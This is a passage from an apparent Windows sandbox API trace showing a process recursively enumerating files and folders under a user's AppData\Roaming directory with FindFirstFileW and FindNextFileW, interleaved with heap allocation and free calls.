Size=0x14) returned 0x2ceff0 [0220.163] GetProcessHeap () returned 0x2b0000 [0220.163] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f3978 | out: hHeap=0x2b0000) returned 1 [0220.163] GetProcessHeap () returned 0x2b0000 [0220.163] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6040 | out: hHeap=0x2b0000) returned 1 [0220.163] GetProcessHeap () returned 0x2b0000 [0220.163] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3e40 | out: hHeap=0x2b0000) returned 1 [0220.163] FindNextFileW (in: hFindFile=0x2eb468, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.163] FindNextFileW (in: hFindFile=0x2eb468, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.163] GetLastError () returned 0x12 [0220.164] GetProcessHeap () returned 0x2b0000 [0220.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e1620 | out: hHeap=0x2b0000) returned 1 [0220.164] GetProcessHeap () returned 0x2b0000 [0220.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0220.164] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.164] GetLastError () returned 0x12 [0220.164] GetProcessHeap () returned 0x2b0000 [0220.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ec3f0 | out: hHeap=0x2b0000) returned 1 [0220.164] GetProcessHeap () returned 0x2b0000 [0220.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0220.165] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x89c16e50, ftCreationTime.dwHighDateTime=0x1d75950, ftLastAccessTime.dwLowDateTime=0xfd5a1260, ftLastAccessTime.dwHighDateTime=0x1d75985, ftLastWriteTime.dwLowDateTime=0xfd5a1260, ftLastWriteTime.dwHighDateTime=0x1d75985, nFileSizeHigh=0x0, nFileSizeLow=0xffce, dwReserved0=0x0, dwReserved1=0x0, cFileName="IHZBb8-97YbZBCUOm.png", cAlternateFileName="IHZBB8~1.PNG")) returned 1 [0220.165] GetProcessHeap () returned 0x2b0000 [0220.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x15) returned 0x2cefd0 [0220.165] GetProcessHeap () returned 0x2b0000 [0220.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.166] GetProcessHeap () returned 0x2b0000 [0220.166] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.166] GetProcessHeap () returned 0x2b0000 [0220.166] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0220.166] GetProcessHeap () returned 0x2b0000 [0220.166] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.166] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49a1d2d0, ftCreationTime.dwHighDateTime=0x1d7587c, ftLastAccessTime.dwLowDateTime=0x46d9b560, ftLastAccessTime.dwHighDateTime=0x1d75a2d, ftLastWriteTime.dwLowDateTime=0x46d9b560, ftLastWriteTime.dwHighDateTime=0x1d75a2d, nFileSizeHigh=0x0, nFileSizeLow=0xadcf, dwReserved0=0x0, dwReserved1=0x0, cFileName="iIVxIajX_LQOQ o-Kq.wav", cAlternateFileName="IIVXIA~1.WAV")) returned 1 [0220.166] GetProcessHeap () returned 0x2b0000 [0220.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x16) returned 0x2cefd0 [0220.167] GetProcessHeap () returned 0x2b0000 [0220.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.167] GetProcessHeap () returned 0x2b0000 [0220.167] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.167] GetProcessHeap () returned 0x2b0000 [0220.167] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0220.167] GetProcessHeap () returned 0x2b0000 [0220.167] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.167] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdf0aa540, ftCreationTime.dwHighDateTime=0x1d7584a, ftLastAccessTime.dwLowDateTime=0x64ea9bc0, ftLastAccessTime.dwHighDateTime=0x1d75a1c, ftLastWriteTime.dwLowDateTime=0x64ea9bc0, ftLastWriteTime.dwHighDateTime=0x1d75a1c, nFileSizeHigh=0x0, nFileSizeLow=0xbad2, dwReserved0=0x0, dwReserved1=0x0, cFileName="JvpPaOOWQ.swf", cAlternateFileName="JVPPAO~1.SWF")) returned 1 [0220.168] GetProcessHeap () returned 0x2b0000 [0220.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd) returned 0x2f5238 [0220.168] GetProcessHeap () returned 0x2b0000 [0220.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.168] GetProcessHeap () returned 0x2b0000 [0220.168] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.168] GetProcessHeap () returned 0x2b0000 [0220.168] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.168] GetProcessHeap () returned 0x2b0000 [0220.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.169] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40ebd780, ftCreationTime.dwHighDateTime=0x1d75868, ftLastAccessTime.dwLowDateTime=0x114641e0, ftLastAccessTime.dwHighDateTime=0x1d759c7, ftLastWriteTime.dwLowDateTime=0x114641e0, ftLastWriteTime.dwHighDateTime=0x1d759c7, nFileSizeHigh=0x0, nFileSizeLow=0xe792, dwReserved0=0x0, dwReserved1=0x0, cFileName="kcc3GBa.swf", cAlternateFileName="")) returned 1 [0220.169] GetProcessHeap () returned 0x2b0000 [0220.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb) returned 0x2f5238 [0220.169] GetProcessHeap () returned 0x2b0000 [0220.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.169] GetProcessHeap () returned 0x2b0000 [0220.169] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.170] GetProcessHeap () returned 0x2b0000 [0220.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.170] GetProcessHeap () returned 0x2b0000 [0220.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.170] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd4c213f0, ftCreationTime.dwHighDateTime=0x1d75a63, ftLastAccessTime.dwLowDateTime=0x43b37f20, ftLastAccessTime.dwHighDateTime=0x1d75bee, ftLastWriteTime.dwLowDateTime=0x43b37f20, ftLastWriteTime.dwHighDateTime=0x1d75bee, nFileSizeHigh=0x0, nFileSizeLow=0xfb05, dwReserved0=0x0, dwReserved1=0x0, cFileName="kRj677fBb q.rtf", cAlternateFileName="KRJ677~1.RTF")) returned 1 [0220.170] GetProcessHeap () returned 0x2b0000 [0220.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xf) returned 0x2f5238 [0220.170] GetProcessHeap () returned 0x2b0000 [0220.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.171] GetProcessHeap () returned 0x2b0000 [0220.171] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.171] GetProcessHeap () returned 0x2b0000 [0220.171] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.171] GetProcessHeap () returned 0x2b0000 [0220.171] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.171] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7245740, ftCreationTime.dwHighDateTime=0x1d75235, ftLastAccessTime.dwLowDateTime=0x80459000, ftLastAccessTime.dwHighDateTime=0x1d75ab2, ftLastWriteTime.dwLowDateTime=0x80459000, ftLastWriteTime.dwHighDateTime=0x1d75ab2, nFileSizeHigh=0x0, nFileSizeLow=0x73a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="mfsU-sGX.avi", cAlternateFileName="")) returned 1 [0220.171] GetProcessHeap () returned 0x2b0000 [0220.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2f5238 [0220.171] GetProcessHeap () returned 0x2b0000 [0220.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.172] GetProcessHeap () returned 0x2b0000 [0220.172] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.172] GetProcessHeap () returned 0x2b0000 [0220.172] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.172] GetProcessHeap () returned 0x2b0000 [0220.172] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.172] FindNextFileW (in: hFindFile=0x2eb3e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8c137f60, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x8c137f60, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0220.172] GetProcessHeap () returned 0x2b0000 [0220.172] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9) returned 0x2f5238 [0220.173] GetProcessHeap () returned 0x2b0000 [0220.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.173] GetProcessHeap () returned 0x2b0000 [0220.173] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.173] GetProcessHeap () returned 0x2b0000 [0220.173] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.173] GetProcessHeap () returned 0x2b0000 [0220.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2c) returned 0x2ec3f0 [0220.173] GetProcessHeap () returned 0x2b0000 [0220.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2c) returned 0x2ec460 [0220.173] GetProcessHeap () returned 0x2b0000 [0220.174] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.174] GetProcessHeap () returned 0x2b0000 [0220.174] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a) returned 0x2cfc80 [0220.174] GetProcessHeap () returned 0x2b0000 [0220.174] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x34) returned 0x2eb428 [0220.174] GetProcessHeap () returned 0x2b0000 [0220.174] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb428, Size=0x68) returned 0x2f7508 [0220.174] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8c137f60, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x8c137f60, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb428 [0220.174] GetProcessHeap () returned 0x2b0000 [0220.174] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x14) returned 0x2cefd0 [0220.174] GetProcessHeap () returned 0x2b0000 [0220.174] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f7508 | out: hHeap=0x2b0000) returned 1 [0220.174] GetProcessHeap () returned 0x2b0000 [0220.174] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e1620 | out: hHeap=0x2b0000) returned 1 [0220.175] GetProcessHeap () returned 0x2b0000 [0220.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.175] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8c137f60, ftLastAccessTime.dwHighDateTime=0x1d772da, ftLastWriteTime.dwLowDateTime=0x8c137f60, ftLastWriteTime.dwHighDateTime=0x1d772da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.175] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0220.175] GetProcessHeap () returned 0x2b0000 [0220.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f0870 [0220.175] GetProcessHeap () returned 0x2b0000 [0220.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2c) returned 0x2ec460 [0220.176] GetProcessHeap () returned 0x2b0000 [0220.176] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.176] GetProcessHeap () returned 0x2b0000 [0220.176] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0870 | out: hHeap=0x2b0000) returned 1 [0220.176] GetProcessHeap () returned 0x2b0000 [0220.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x33) returned 0x2eb468 [0220.176] GetProcessHeap () returned 0x2b0000 [0220.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x33) returned 0x2eb4a8 [0220.176] GetProcessHeap () returned 0x2b0000 [0220.176] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x66) returned 0x2f7508 [0220.176] GetProcessHeap () returned 0x2b0000 [0220.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2cfc80 [0220.176] GetProcessHeap () returned 0x2b0000 [0220.177] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x38) returned 0x2eb4a8 [0220.177] GetProcessHeap () returned 0x2b0000 [0220.177] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x70) returned 0x2fdf40 [0220.177] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.177] GetProcessHeap () returned 0x2b0000 [0220.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x14) returned 0x2ceff0 [0220.178] GetProcessHeap () returned 0x2b0000 [0220.178] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fdf40 | out: hHeap=0x2b0000) returned 1 [0220.178] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.178] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.178] GetLastError () returned 0x12 [0220.178] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0220.179] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.179] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x72) returned 0x2c0b20 [0220.179] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x40) returned 0x2c78c0 [0220.180] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x80) returned 0x2fa200 [0220.180] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb468 [0220.181] FindNextFileW (in: hFindFile=0x2eb468, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.181] FindNextFileW (in: hFindFile=0x2eb468, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2861ac30, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 1 [0220.181] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x72) returned 0x2c0b20 [0220.181] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7ab8, Size=0x7e) returned 0x2fa200 [0220.181] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.182] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c69a0, Size=0x88) returned 0x2fdf40 [0220.182] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2861ac30, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.184] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2861ac30, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.185] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6f297690, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x51722, dwReserved0=0x0, dwReserved1=0x0, cFileName="APASixthEditionOfficeOnline.xsl", cAlternateFileName="APASIX~1.XSL")) returned 1 [0220.185] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7ab8, Size=0x7e) returned 0x2fa200 [0220.186] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef779b0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x48839, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHICAGO.XSL", cAlternateFileName="")) returned 1 [0220.186] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7ab8, Size=0x7e) returned 0x2fa200 [0220.186] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef779b0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x4197e, dwReserved0=0x0, dwReserved1=0x0, cFileName="GB.XSL", cAlternateFileName="")) returned 1 [0220.187] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7ab8, Size=0x7e) returned 0x2fa200 [0220.187] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef05590, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x3e966, dwReserved0=0x0, dwReserved1=0x0, cFileName="GostName.XSL", cAlternateFileName="")) returned 1 [0220.187] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7ab8, Size=0x7e) returned 0x2fa200 [0220.188] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, 